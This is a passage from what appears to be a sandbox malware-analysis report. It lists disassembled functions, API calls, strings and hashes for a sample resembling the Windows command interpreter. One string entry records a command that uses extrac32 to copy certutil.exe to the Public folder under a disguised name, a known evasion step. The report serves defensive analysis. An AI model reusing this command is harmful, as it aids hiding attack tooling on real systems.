                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: Console$LockShared_get_osfhandle$AcquireBufferErrorFileHandleInfoLastModeReleaseScreenTypeWrite
                                                      • String ID:
                                                      • API String ID: 611521582-0
                                                      • Opcode ID: 273daed2c2834dfc8b6dfef377a9808402fe7d58939b34531bf6f611b2348d3e
                                                      • Instruction ID: e67de628feecd4995199a8be9ed52fba567cc3b849a72915c67a4e4799ac21ff
                                                      • Opcode Fuzzy Hash: 273daed2c2834dfc8b6dfef377a9808402fe7d58939b34531bf6f611b2348d3e
                                                      • Instruction Fuzzy Hash: 77A1B332F08612A6E718EB61A84277DF7A1FB49B46F848136DD0E86744DFBCE445C722
                                                      Function 00007FF7E1DB1560 Relevance: 26.6, APIs: 14, Strings: 1, Instructions: 338fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: Find$File$CloseFirstmemset$AttributesErrorLastNext
                                                      • String ID: \\?\
                                                      • API String ID: 628682198-4282027825
                                                      • Opcode ID: ab4f5c44bb3b2f47c3e9ebd780c12a08782b375ce868dac15c085b2dd5d8372f
                                                      • Instruction ID: 0e0047877174ccb5597f79595851b8d37e198dd4aa1585147ce000eebb1e1bbf
                                                      • Opcode Fuzzy Hash: ab4f5c44bb3b2f47c3e9ebd780c12a08782b375ce868dac15c085b2dd5d8372f
                                                      • Instruction Fuzzy Hash: B9E1A126B08682A6EF64EB24E8427F9A3A0FB45749F804136DA0F477D4EF7CE545C351
                                                      Function 00007FF7E1DDAFBC Relevance: 26.0, APIs: 17, Instructions: 537COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: wcschr$memset$ErrorFileHeapLast$AllocAttributesCloseFindMoveProcessProgressWith_setjmpiswspacelongjmpwcsrchr
                                                      • String ID:
                                                      • API String ID: 16309207-0
                                                      • Opcode ID: 19f7487062f5412cc71b33675df9748e948d815796b78eae70ebb84bfe4e28a0
                                                      • Instruction ID: 7f3a0b447ce4223a926389e97db6297e66d3dd765cd91648b143fa00ab340d61
                                                      • Opcode Fuzzy Hash: 19f7487062f5412cc71b33675df9748e948d815796b78eae70ebb84bfe4e28a0
                                                      • Instruction Fuzzy Hash: FA229F62B04B8296EB64EF25D8523F9A3A0FF45788F804236DA0E4B795DFBCE145C711
                                                      Function 00007FF7E1DBCE10 Relevance: 24.8, APIs: 12, Strings: 2, Instructions: 337COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$ConsoleEnterInfoLeaveOutput_tell_wcsicmpmemset
                                                      • String ID: GOTO$extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                                      • API String ID: 3863671652-4137775220
                                                      • Opcode ID: 104ee4ee76553c34201f69de345d222e7098a2d95a8d36985cd7be8190364567
                                                      • Instruction ID: a5d8bd550043e07c831d4c9aab387525c9e481b949d0ad55120c46f19a3550e0
                                                      • Opcode Fuzzy Hash: 104ee4ee76553c34201f69de345d222e7098a2d95a8d36985cd7be8190364567
                                                      • Instruction Fuzzy Hash: 1BE1DE22E0D64292FB64FB1594567B9E6A0BF89784FC84537DA0E422D0DFBCE841C763
                                                      Function 00007FF7E1DB3410 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 160windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: FormatMessage$ByteCharMultiWide_ultoawcschr
                                                      • String ID: $Application$System
                                                      • API String ID: 3538039442-1881496484
                                                      • Opcode ID: 6194e2a1b63514fbe775a342b0db58f28aa4d046a1287b5b4022a3f3c67c0b5b
                                                      • Instruction ID: 3c4c0c7e80ede984a8abb4df489120b06ebc7102d8eece773108a3f7b1a557fa
                                                      • Opcode Fuzzy Hash: 6194e2a1b63514fbe775a342b0db58f28aa4d046a1287b5b4022a3f3c67c0b5b
                                                      • Instruction Fuzzy Hash: B751CB72A08B41A6EB24EB15B44277AFBA1FB89B85F848236DE4E43B40DF7CD445C711
                                                      Function 00007FF7E1DDD9D0 Relevance: 23.3, APIs: 10, Strings: 3, Instructions: 576fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • longjmp.MSVCRT(?,?,00000000,00007FF7E1DD048E), ref: 00007FF7E1DDDA58
                                                      • memset.MSVCRT ref: 00007FF7E1DDDAD6
                                                      • memset.MSVCRT ref: 00007FF7E1DDDAFC
                                                      • memset.MSVCRT ref: 00007FF7E1DDDB22
                                                        • Part of subcall function 00007FF7E1DC3A0C: FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF7E1DDEAC5,?,?,?,00007FF7E1DDE925,?,?,?,?,00007FF7E1DBB9B1), ref: 00007FF7E1DC3A56
                                                        • Part of subcall function 00007FF7E1DB5194: VirtualAlloc.API-MS-WIN-CORE-MEMORY-L1-1-0 ref: 00007FF7E1DB51C4
                                                        • Part of subcall function 00007FF7E1DC823C: FindFirstFileExW.KERNELBASE ref: 00007FF7E1DC8280
                                                        • Part of subcall function 00007FF7E1DC823C: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7E1DC829D
                                                        • Part of subcall function 00007FF7E1DC01B8: _get_osfhandle.MSVCRT ref: 00007FF7E1DC01C4
                                                        • Part of subcall function 00007FF7E1DC01B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF7E1DCE904,?,?,?,?,00000000,00007FF7E1DC3491,?,?,?,00007FF7E1DD4420), ref: 00007FF7E1DC01D6
                                                        • Part of subcall function 00007FF7E1DB4FE8: _get_osfhandle.MSVCRT ref: 00007FF7E1DB5012
                                                        • Part of subcall function 00007FF7E1DB4FE8: ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7E1DB5030
                                                      • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7E1DDDDB0
                                                        • Part of subcall function 00007FF7E1DB59E4: CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7E1DB5A2E
                                                        • Part of subcall function 00007FF7E1DB59E4: _open_osfhandle.MSVCRT ref: 00007FF7E1DB5A4F
                                                      • _get_osfhandle.MSVCRT ref: 00007FF7E1DDDDEB
                                                      • SetEndOfFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7E1DDDDFA
                                                      • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7E1DDE204
                                                      • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7E1DDE223
                                                      • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7E1DDE242
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: File$_get_osfhandlememset$Find$AllocAttributesCloseCreateErrorFirstLastReadTypeVirtual_open_osfhandlelongjmp
                                                      • String ID: %9d$%s$~
                                                      • API String ID: 3651208239-912394897
                                                      • Opcode ID: ab2ad948d6a97cdcb1dc93790fda6d9a1dccb8bf0f4939a4d6f77afca15fad3e
                                                      • Instruction ID: a1c0262e26d6b0554f71c6bc3564b399bdc687e196625d71b9b66e2c845a3b77
                                                      • Opcode Fuzzy Hash: ab2ad948d6a97cdcb1dc93790fda6d9a1dccb8bf0f4939a4d6f77afca15fad3e
                                                      • Instruction Fuzzy Hash: E1428F32A08A8296EB24FF25D8523F9B7A4FB85744F800137D64E47A99DFBCE550C712
                                                      Function 00007FF7E1DB372C Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 396COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: wcsrchr$ErrorLast$AttributesFile_wcsnicmpiswspacememsetwcschr
                                                      • String ID: COPYCMD$\
                                                      • API String ID: 3989487059-1802776761
                                                      • Opcode ID: 5bff41a680e467b1b33a0b7bb16375dc4a11cdb88bd4a8787dadcd2c99fb79b7
                                                      • Instruction ID: 9e1a6a94b4b8e035d22c86013eb1e46fd859da1bc61c07694f1971cd81041e7d
                                                      • Opcode Fuzzy Hash: 5bff41a680e467b1b33a0b7bb16375dc4a11cdb88bd4a8787dadcd2c99fb79b7
                                                      • Instruction Fuzzy Hash: C9F1C466A08746A2EF14FB15D4027BAA3A0FF45B88F848136DA4E47794DEBCE445C312
                                                      Function 00007FF7E1DC3140 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 229timeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: Time$File$System$FormatInfoLocalLocale
                                                      • String ID: $%02d%s%02d%s$%2d%s%02d%s%02d%s%02d$.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$HH:mm:ss t
                                                      • API String ID: 55602301-2548490036
                                                      • Opcode ID: d793cf68f885368b4ca952d7378f9a0084057b150934299f8dfb9ae4312d122b
                                                      • Instruction ID: 1d81495663f18913f5a425ee5dfbf1c4af75a6e8b2850edae04c996415d0972c
                                                      • Opcode Fuzzy Hash: d793cf68f885368b4ca952d7378f9a0084057b150934299f8dfb9ae4312d122b
                                                      • Instruction Fuzzy Hash: 56A1C272B1864296EB10EB10E4423BAFBA5FB84754F904533DA4E436D4EFBCE544C792
                                                      Function 00007FF7E1DE1538 Relevance: 19.7, APIs: 13, Instructions: 169filememorynativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: Path$ErrorName$Lastmemset$CreateDirectoryFileFullVolumememmove$CloseControlDriveFreeHandleHeapInformationName_RemoveStatusType_wcsicmp
                                                      • String ID:
                                                      • API String ID: 3935429995-0
                                                      • Opcode ID: 2ee110a42e0ffdb27aede9fb5eb1a80379d063d7b2cbba6d0c9e22b52d84b57f
                                                      • Instruction ID: 0febf9bca531a8130b892e7c5825a0b866489d6ea6cedbe7e76f82928a983e41
                                                      • Opcode Fuzzy Hash: 2ee110a42e0ffdb27aede9fb5eb1a80379d063d7b2cbba6d0c9e22b52d84b57f
                                                      • Instruction Fuzzy Hash: 2961B126F08652C2EB18EF25A405679FBA0FB89F56F858136DE4A83790DFBCD441C712
                                                      Function 00007FF7E1DB35B8 Relevance: 18.2, APIs: 12, Instructions: 214COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: AttributesFile
                                                      • String ID:
                                                      • API String ID: 3188754299-0
                                                      • Opcode ID: 41fbdc0f45981392a8be1ae3f0b798cbf48c2336bf4ed7969cfd2cedfd2f237f
                                                      • Instruction ID: 6e1a201696e3ed7ad28779a54e64cccd2fc5207fed1f28e64699dda89a43609c
                                                      • Opcode Fuzzy Hash: 41fbdc0f45981392a8be1ae3f0b798cbf48c2336bf4ed7969cfd2cedfd2f237f
                                                      • Instruction Fuzzy Hash: 3591B332A0868296EB28EF25D8117FDB7A0FB49745F848236DA4F46794DFBCE544C321
                                                      Function 00007FF7E1DBB0D8 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 320COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: _get_osfhandlememset$wcschr
                                                      • String ID: DPATH
                                                      • API String ID: 3260997497-2010427443
                                                      • Opcode ID: 3d336d0508f9d51260e4716dc0b75001e2ca59ffb0876634830191a582af1c3b
                                                      • Instruction ID: 21d4be82cfa3121dabaa633e2b6f1d48cbe008dccb2820a9a9062a1683d9fcb5
                                                      • Opcode Fuzzy Hash: 3d336d0508f9d51260e4716dc0b75001e2ca59ffb0876634830191a582af1c3b
                                                      • Instruction Fuzzy Hash: 25D19322A0864296EB14EB25D4427BDA3A1FF85B94FC44637DA1E473D4DFBCE441C3A2
                                                      Function 00007FF7E1DD86FC Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 226timeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: LocalTime$ErrorLast_get_osfhandle
                                                      • String ID: %s$/-.$:
                                                      • API String ID: 1644023181-879152773
                                                      • Opcode ID: 52adc4b69c0d6b0cc37f226843e3bc06c06473f0745bac629c27b33a4c267472
                                                      • Instruction ID: 701e5021337040c924c7f446fcc6cad4d86dbdf22d7f0a67309c3071e22cea9d
                                                      • Opcode Fuzzy Hash: 52adc4b69c0d6b0cc37f226843e3bc06c06473f0745bac629c27b33a4c267472
                                                      • Instruction Fuzzy Hash: 9391A562A0864291EF15EB14E4423BEE3A0FF84B94FC44637DA4E426D4DFBCE595C322
                                                      Function 00007FF7E1DC7FF8 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 87filenativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: File$InformationNamePathRelative$CloseDeleteErrorFreeHandleLastName_OpenQueryReleaseStatusStringUnicodeVolumeWith
                                                      • String ID: @P
                                                      • API String ID: 1801357106-3670739982
                                                      • Opcode ID: a098cbb43c680f3415d79602374c39353e633b648bff1f45cd59ed0b1006156a
                                                      • Instruction ID: f012a330288890c775e9b7097032eefbf5c261d9baa7bed3ac9dd30fb96c32d5
                                                      • Opcode Fuzzy Hash: a098cbb43c680f3415d79602374c39353e633b648bff1f45cd59ed0b1006156a
                                                      • Instruction Fuzzy Hash: 9F416A32B04A46DAE710EF61D4413FDBBA0FB89B49F848632DA0D43A98DFB8D544C761
                                                      Function 00007FF7E1DB2220 Relevance: 15.4, APIs: 10, Instructions: 368COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: memset$BufferConsoleInfoScreen
                                                      • String ID:
                                                      • API String ID: 1034426908-0
                                                      • Opcode ID: 64486a4b6b13c1c8e977e62f0f94e25a0603b25ea896dd7b7fc126d69d5cd52d
                                                      • Instruction ID: 1e2b05eb7fc18875babc9126ddd7b3df1e1bebb1f2a674aa9e18998d8d1fa8a2
                                                      • Opcode Fuzzy Hash: 64486a4b6b13c1c8e977e62f0f94e25a0603b25ea896dd7b7fc126d69d5cd52d
                                                      • Instruction Fuzzy Hash: 82F1A032A097829AEB64EF21D8427E9A7A0FF45784F808136DA4E47795DFBCF504C721
                                                      Function 00007FF7E1DDAC4C Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 194registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: CloseValue$CreateDeleteOpen
                                                      • String ID: %s=%s$\Shell\Open\Command
                                                      • API String ID: 4081037667-3301834661
                                                      • Opcode ID: 95367a666dc1e10ecfff189f591a6456c9e88ca4fe6cad7e4a3eb832a6d246c2
                                                      • Instruction ID: d714daca24100470a86019048950b9674620c70542a5decd555da3401de8d332
                                                      • Opcode Fuzzy Hash: 95367a666dc1e10ecfff189f591a6456c9e88ca4fe6cad7e4a3eb832a6d246c2
                                                      • Instruction Fuzzy Hash: 2771C422B0974292EB10EB69A4523B9E3A1FF85790FC48632DE4E47784DFBCE545C721
                                                      Function 00007FF7E1DDAA30 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 123registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7E1DDAA85
